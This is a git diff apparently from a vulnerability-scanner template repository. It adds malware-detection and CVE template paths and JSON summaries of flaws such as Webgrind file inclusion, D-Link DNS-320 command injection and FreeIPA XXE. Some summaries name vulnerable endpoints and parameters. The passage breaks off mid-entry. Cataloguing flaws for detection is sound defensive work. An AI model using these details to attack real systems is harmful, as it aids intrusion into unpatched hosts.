diff --git a/.github/scripts/wordpress-plugins-update-requirements.txt b/.github/scripts/wordpress-plugins-update-requirements.txt
index 1271cdcb38..c40098b38d 100644
--- a/.github/scripts/wordpress-plugins-update-requirements.txt
+++ b/.github/scripts/wordpress-plugins-update-requirements.txt
@@ -1,6 +1,6 @@
 beautifulsoup4==4.11.1
 bs4==0.0.1
-certifi==2022.9.24
+certifi==2023.7.22
 charset-normalizer==2.1.1
 idna==3.4
 Markdown==3.4.1
diff --git a/.new-additions b/.new-additions
index 78231495e8..ed57c5c03c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,12 +1,164 @@ +file/malware/aar-malware.yaml +file/malware/adzok-malware.yaml +file/malware/alfa-malware.yaml +file/malware/alienspy-malware.yaml +file/malware/alina-malware.yaml +file/malware/alpha-malware.yaml +file/malware/andromeda-malware.yaml +file/malware/ap0calypse-malware.yaml +file/malware/arcom-malware.yaml +file/malware/arkei-malware.yaml +file/malware/backoff-malware.yaml +file/malware/bandook-malware.yaml +file/malware/blacknix-malware.yaml +file/malware/blackworm-malware.yaml +file/malware/bluebanana-malware.yaml +file/malware/bozok-malware.yaml +file/malware/bublik-malware.yaml +file/malware/cap-hookexkeylogger-malware.yaml +file/malware/cerberus-malware.yaml +file/malware/clientmesh-malware.yaml +file/malware/crimson-malware.yaml +file/malware/cryptxxx-dropper-malware.yaml +file/malware/cryptxxx-malware.yaml +file/malware/cxpid-malware.yaml +file/malware/cythosia-malware.yaml +file/malware/darkrat-malware.yaml +file/malware/ddostf-malware.yaml +file/malware/derkziel-malware.yaml +file/malware/dexter-malware.yaml +file/malware/diamondfox-malware.yaml +file/malware/dmalocker-malware.yaml +file/malware/doublepulsar-malware.yaml +file/malware/eicar-malware.yaml +file/malware/erebus-malware.yaml +file/malware/ezcob-malware.yaml +file/malware/fudcrypt-malware.yaml +file/malware/gafgyt-bash-malware.yaml +file/malware/gafgyt-generic-malware.yaml +file/malware/gafgyt-hihi-malware.yaml +file/malware/gafgyt-hoho-malware.yaml +file/malware/gafgyt-jackmy-malware.yaml +file/malware/gafgyt-oh-malware.yaml +file/malware/genome-malware.yaml +file/malware/glass-malware.yaml +file/malware/glasses-malware.yaml +file/malware/gozi-malware.yaml +file/malware/gpgqwerty-malware.yaml +file/malware/greame-malware.yaml +file/malware/grozlex-malware.yaml +file/malware/hawkeye-malware.yaml +file/malware/imminent-malware.yaml +file/malware/infinity-malware.yaml +file/malware/insta11-malware.yaml +file/malware/intel-virtualization-malware.yaml 
+file/malware/iotreaper-malware.yaml +file/malware/linux-aesddos-malware.yaml +file/malware/linux-billgates-malware.yaml +file/malware/linux-elknot-malware.yaml +file/malware/linux-mrblack-malware.yaml +file/malware/linux-tsunami-malware.yaml +file/malware/locky-malware.yaml +file/malware/lostdoor-malware.yaml +file/malware/luminositylink-malware.yaml +file/malware/luxnet-malware.yaml +file/malware/macgyver-installer-malware.yaml +file/malware/macgyver-malware.yaml +file/malware/madness-malware.yaml +file/malware/miner--malware.yaml +file/malware/miniasp3-malware.yaml +file/malware/naikon-malware.yaml +file/malware/naspyupdate-malware.yaml +file/malware/notepad-malware.yaml +file/malware/olyx-malware.yaml +file/malware/osx-leverage-malware.yaml +file/malware/paradox-malware.yaml +file/malware/plasma-malware.yaml +file/malware/poetrat-malware.yaml +file/malware/pony-malware.yaml +file/malware/pubsab-malware.yaml +file/malware/punisher-malware.yaml +file/malware/pypi-malware.yaml +file/malware/pythorat-malware.yaml +file/malware/qrat-malware.yaml +file/malware/satana-dropper-malware.yaml +file/malware/satana-malware.yaml +file/malware/shimrat-malware.yaml +file/malware/shimratreporter-malware.yaml +file/malware/sigma-malware.yaml +file/malware/smallnet-malware.yaml +file/malware/snake-malware.yaml +file/malware/sub7nation-malware.yaml +file/malware/t5000-malware.yaml +file/malware/tedroo-malware.yaml +file/malware/terminator-malware.yaml +file/malware/teslacrypt-malware.yaml +file/malware/tox-malware.yaml +file/malware/treasurehunt-malware.yaml +file/malware/trickbot-malware.yaml +file/malware/trumpbot-malware.yaml +file/malware/universal-1337-malware.yaml +file/malware/unrecom-malware.yaml +file/malware/urausy-malware.yaml +file/malware/vertex-malware.yaml +file/malware/virusrat-malware.yaml +file/malware/wabot-malware.yaml +file/malware/warp-malware.yaml +file/malware/xhide-malware.yaml +file/malware/xor-ddos-malware.yaml +file/malware/yayih-malware.yaml 
+file/malware/zeghost-malware.yaml +file/malware/zoxpng-malware.yaml +http/cnvd/2021/CNVD-2021-41972.yaml +http/cnvd/2021/CNVD-2021-43984.yaml +http/cves/2018/CVE-2018-12909.yaml +http/cves/2018/CVE-2018-18809.yaml +http/cves/2018/CVE-2018-7653.yaml http/cves/2019/CVE-2019-14750.yaml +http/cves/2019/CVE-2019-16057.yaml +http/cves/2019/CVE-2019-7192.yaml http/cves/2022/CVE-2022-0169.yaml +http/cves/2022/CVE-2022-2414.yaml http/cves/2022/CVE-2022-40843.yaml http/cves/2023/CVE-2023-1698.yaml +http/cves/2023/CVE-2023-22478.yaml +http/cves/2023/CVE-2023-22480.yaml http/cves/2023/CVE-2023-32117.yaml http/cves/2023/CVE-2023-35082.yaml http/cves/2023/CVE-2023-37580.yaml +http/cves/2023/CVE-2023-39120.yaml +http/cves/2023/CVE-2023-39143.yaml +http/default-logins/bloofoxcms-default-login.yaml +http/exposed-panels/acenet-panel.yaml +http/exposed-panels/bloofoxcms-login-panel.yaml +http/exposed-panels/discuz-panel.yaml +http/exposed-panels/kodak-network-panel.yaml +http/exposed-panels/mpsec-isg1000-panel.yaml +http/exposures/files/socks5-vpn-config.yaml +http/misconfiguration/bitbucket-auth-bypass.yaml +http/misconfiguration/casdoor-users-password.yaml +http/misconfiguration/clickhouse-unauth-api.yaml +http/misconfiguration/installer/yzmcms-installer.yaml http/misconfiguration/mobsf-framework-exposure.yaml http/misconfiguration/openstack-config.yaml http/misconfiguration/oracle-reports-services.yaml +http/misconfiguration/sonarqube-projects-disclosure.yaml http/vulnerabilities/apache/apache-solr-rce.yaml +http/vulnerabilities/bsphp-info.yaml +http/vulnerabilities/discuz/discuz-api-pathinfo.yaml +http/vulnerabilities/joomla/joomla-department-sqli.yaml +http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml +http/vulnerabilities/netmizer/netmizer-data-listing.yaml +http/vulnerabilities/other/acti-video-lfi.yaml +http/vulnerabilities/other/avcon6-execl-lfi.yaml +http/vulnerabilities/other/avcon6-lfi.yaml +http/vulnerabilities/other/clodop-printer-lfi.yaml 
+http/vulnerabilities/other/easyimage-downphp-lfi.yaml +http/vulnerabilities/other/kodak-network-lfi.yaml +http/vulnerabilities/other/sangfor-cphp-rce.yaml +http/vulnerabilities/other/sangfor-download-lfi.yaml +http/vulnerabilities/other/sangfor-sysuser-conf.yaml http/vulnerabilities/wordpress/photo-gallery-xss.yaml +http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml +http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +http/vulnerabilities/zzzcms/zzzcms-xss.yaml diff --git a/cves.json b/cves.json index 19d8533442..b74c960364 100644 --- a/cves.json +++ b/cves.json 
@@ -477,6 +477,7 @@ {"ID":"CVE-2018-12675","Info":{"Name":"SV3C HD Camera L Series - Open Redirect","Severity":"medium","Description":"SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12675.yaml"} {"ID":"CVE-2018-1271","Info":{"Name":"Spring MVC Framework - Local File Inclusion","Severity":"medium","Description":"Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2018/CVE-2018-1271.yaml"} {"ID":"CVE-2018-1273","Info":{"Name":"Spring Data Commons - Remote Code Execution","Severity":"critical","Description":"Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\nand older unsupported versions, contain a property binder vulnerability\ncaused by improper neutralization of special elements.\nAn unauthenticated remote malicious user (or attacker) can supply\nspecially crafted request parameters against Spring Data REST backed HTTP resources\nor using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-1273.yaml"} +{"ID":"CVE-2018-12909","Info":{"Name":"Webgrind \u003c= 1.5 - Local File Inclusion","Severity":"high","Description":"Webgrind 1.5 relies on user input to 
display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer\u0026file= URI\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-12909.yaml"} {"ID":"CVE-2018-12998","Info":{"Name":"Zoho manageengine - Cross-Site Scripting","Severity":"medium","Description":"Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12998.yaml"} {"ID":"CVE-2018-1335","Info":{"Name":"Apache Tika \u003c1.1.8- Header Command Injection","Severity":"high","Description":"Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-1335.yaml"} {"ID":"CVE-2018-13379","Info":{"Name":"Fortinet FortiOS - Credentials Disclosure","Severity":"critical","Description":"Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-13379.yaml"} 
@@ -525,6 +526,7 @@ {"ID":"CVE-2018-18775","Info":{"Name":"Microstrategy Web 7 - Cross-Site Scripting","Severity":"medium","Description":"Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-18775.yaml"} {"ID":"CVE-2018-18777","Info":{"Name":"Microstrategy Web 7 - Local File Inclusion","Severity":"medium","Description":"Microstrategy Web 7 is vulnerable to local file inclusion via \"/WebMstr7/servlet/mstrWeb\" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-18777.yaml"} {"ID":"CVE-2018-18778","Info":{"Name":"ACME mini_httpd \u003c1.30 - Local File Inclusion","Severity":"medium","Description":"ACME mini_httpd before 1.30 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18778.yaml"} +{"ID":"CVE-2018-18809","Info":{"Name":"TIBCO JasperReports Library - Directory Traversal","Severity":"critical","Description":"The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-18809.yaml"} {"ID":"CVE-2018-18925","Info":{"Name":"Gogs (Go Git Service) 
0.11.66 - Remote Code Execution","Severity":"critical","Description":"Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a \"..\" session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-18925.yaml"} {"ID":"CVE-2018-19136","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19136.yaml"} {"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19137.yaml"} 
@@ -575,6 +577,7 @@ {"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"} {"ID":"CVE-2018-7600","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7600.yaml"} {"ID":"CVE-2018-7602","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. 
Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7602.yaml"} +{"ID":"CVE-2018-7653","Info":{"Name":"YzmCMS v3.6 - Cross-Site Scripting","Severity":"medium","Description":"In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7653.yaml"} {"ID":"CVE-2018-7662","Info":{"Name":"CouchCMS \u003c= 2.0 - Path Disclosure","Severity":"medium","Description":"CouchCMS \u003c= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-7662.yaml"} {"ID":"CVE-2018-7700","Info":{"Name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","Severity":"high","Description":"DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-7700.yaml"} {"ID":"CVE-2018-7719","Info":{"Name":"Acrolinx Server \u003c5.2.5 - Local File Inclusion","Severity":"high","Description":"Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7719.yaml"} 
@@ -647,6 +650,7 @@ {"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"} {"ID":"CVE-2019-15859","Info":{"Name":"Socomec DIRIS A-40 Devices Password Disclosure","Severity":"critical","Description":"Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15859.yaml"} {"ID":"CVE-2019-15889","Info":{"Name":"WordPress Download Manager \u003c2.9.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15889.yaml"} +{"ID":"CVE-2019-16057","Info":{"Name":"D-Link DNS-320 - Remote Code Execution","Severity":"critical","Description":"The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16057.yaml"} {"ID":"CVE-2019-16097","Info":{"Name":"Harbor \u003c=1.82.0 - Privilege Escalation","Severity":"medium","Description":"Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST 
/api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-16097.yaml"} {"ID":"CVE-2019-16123","Info":{"Name":"PilusCart \u003c=1.4.1 - Local File Inclusion","Severity":"high","Description":"PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-16123.yaml"} {"ID":"CVE-2019-16278","Info":{"Name":"nostromo 1.9.6 - Remote Code Execution","Severity":"critical","Description":"nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16278.yaml"} 
@@ -715,6 +719,7 @@ {"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"} {"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"} {"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"} +{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. 
To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"} {"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"} {"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"} {"ID":"CVE-2019-7254","Info":{"Name":"eMerge E3 1.00-06 - Local File Inclusion","Severity":"high","Description":"Linear eMerge E3-Series devices are vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7254.yaml"} 
@@ -1085,7 +1090,7 @@ {"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"} {"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"} {"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. 
This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"} -{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} +{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} {"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. 
The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"} {"ID":"CVE-2021-24495","Info":{"Name":"Wordpress Marmoset Viewer \u003c1.9.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24495.yaml"} {"ID":"CVE-2021-24498","Info":{"Name":"WordPress Calendar Event Multi View \u003c1.4.01 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24498.yaml"} 
@@ -1548,6 +1553,7 @@ {"ID":"CVE-2022-24112","Info":{"Name":"Apache APISIX - Remote Code Execution","Severity":"critical","Description":"A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24112.yaml"} {"ID":"CVE-2022-24124","Info":{"Name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","Severity":"high","Description":"Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24124.yaml"} {"ID":"CVE-2022-24129","Info":{"Name":"Shibboleth OIDC OP \u003c3.0.4 - Server-Side Request Forgery","Severity":"high","Description":"The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-24129.yaml"} +{"ID":"CVE-2022-2414","Info":{"Name":"FreeIPA - XML Entity Injection","Severity":"high","Description":"Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. 
This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2414.yaml"} {"ID":"CVE-2022-24181","Info":{"Name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","Severity":"medium","Description":"PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24181.yaml"} {"ID":"CVE-2022-24223","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24223.yaml"} {"ID":"CVE-2022-24260","Info":{"Name":"VoipMonitor - Pre-Auth SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24260.yaml"} 
@@ -1857,6 +1863,8 @@ {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} +{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. 
